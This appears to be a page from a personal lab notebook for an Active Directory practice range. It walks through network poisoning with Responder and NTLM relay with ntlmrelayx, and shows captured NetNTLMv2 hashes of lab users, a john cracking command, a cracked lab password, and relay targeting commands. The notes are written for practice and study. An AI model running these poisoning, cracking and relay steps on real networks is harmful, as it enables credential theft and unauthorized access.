⚔️3 - Poisoning & Relay - IPv4

The main idea about that, is leave running in the background responder, while we do other techniques, after a while, meave will have hashes to crack

Responder

sudo responder -I {urInterface}

This are a NETNTML hashes, its cant use to path the hash butttttt... we can crack the password

## NORTH\robb.stark
robb.stark::NORTH:099765fccff65fa5:E2C0F2C331745B607AF6FF02D81D138D:010100000000000000F4476E5BD1DB019B634BBE9B6E118F0000000002000800440049004900360001001E00570049004E002D004D00390054004B00440049005A00560035004400570004003400570049004E002D004D00390054004B00440049005A0056003500440057002E0044004900490036002E004C004F00430041004C000300140044004900490036002E004C004F00430041004C000500140044004900490036002E004C004F00430041004C000700080000F4476E5BD1DB0106000400020000000800300030000000000000000000000000300000EDC8D659F28F9E5076088D3D7C8447504D5AE5544D7709D620CB556CCC2073810A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F007300000000000000000000000000
## NORTH\eddard.stark
eddard.stark::NORTH:395bddb17ce491f9:F675C09198F5AFA609C13F0BDB6F70F5:010100000000000000F4476E5BD1DB0189624EA5551651620000000002000800440049004900360001001E00570049004E002D004D00390054004B00440049005A00560035004400570004003400570049004E002D004D00390054004B00440049005A0056003500440057002E0044004900490036002E004C004F00430041004C000300140044004900490036002E004C004F00430041004C000500140044004900490036002E004C004F00430041004C000700080000F4476E5BD1DB0106000400020000000800300030000000000000000000000000300000EDC8D659F28F9E5076088D3D7C8447504D5AE5544D7709D620CB556CCC2073810A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E00000000000000000000000000

Cracking Hahes

john --format=netntlmv2 NORTHPesponderHashes.txt --wordlist=/usr/share/wordlists/rockyou.txt 
######################################################3
sexywolfy        (robb.stark)

[ i ] Responder keep the logs in /opt/tools/Responder/logs (on exegol), if you need to show them again.

NTLM Relay

Relaying SMB using Responder & Ntlmrelayx

nxc smb 192.168.56.10-23 --gen-relay-list SMBrelay.txt

With this we have a list of signing:False smb computers, we can start to try the relay

Knowing this, frist we need set OFF into /usr/share/responder/Responder.conf the SMB and HTTP -->

With the above list generated by --gen-relay-list (up command), we have a targets. The ejecute the ntlmrelayx -->

192.168.56.22
192.168.56.23

ntlmrelayx -tf SMBrelay.txt -of netntlm -smb2support -socks

First we poison the network and then we launch a responder

sudo responder -I eth0 -dw

A few a time, we can see that both the responder and ntlmrelayx they found socks -->

With it, we can use the command socks into ntlmrealyx ... WAIT

Previous2 - Quick Compromise Next4 - Enumeration without Users

Last updated 6 months ago